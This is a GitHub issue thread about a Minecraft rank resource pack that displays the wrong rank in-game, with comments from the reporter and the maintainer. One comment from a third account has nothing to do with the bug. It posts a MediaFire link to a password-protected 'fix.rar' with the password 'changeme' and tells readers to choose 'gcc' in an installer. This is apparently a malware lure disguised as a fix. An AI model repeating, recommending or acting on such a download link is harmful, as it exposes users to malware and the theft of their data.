### ISSUE TITLE
Ranks format how it shows does not work

### ISSUE THREAD

**Issue by LjeyGames** [DeathEnderMan/Nautical-Ranks#14]
dear DeathEnderMan [And Develepers]

i used the rank pack today but it showed owner but in-game it showed me some other rank please fix this i can get a older version of it maybe but please fix it

**Comment by SupunDevendra** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by DeathEnderMan** [comment]
Hi I tested if it shows up and it dose so I'm a little confused

**Comment by LjeyGames** [comment]
<img width="478" alt="Minecraft Screenshot 2024 08 29 - 17 32 24 34" src="https://github.com/user-attachments/assets/a31dcbe8-962f-4764-a6c1-2fb52c11cc5d">


i pasted the Owner one and it shows me this?

**Comment by LjeyGames** [comment]
also try changing the postitions cause of the new mc update it might of changed or something

**Comment by LjeyGames** [comment]
uhm well is the problem fixed cause i like this ressourcepack and it suddenly doesnt work so yeah
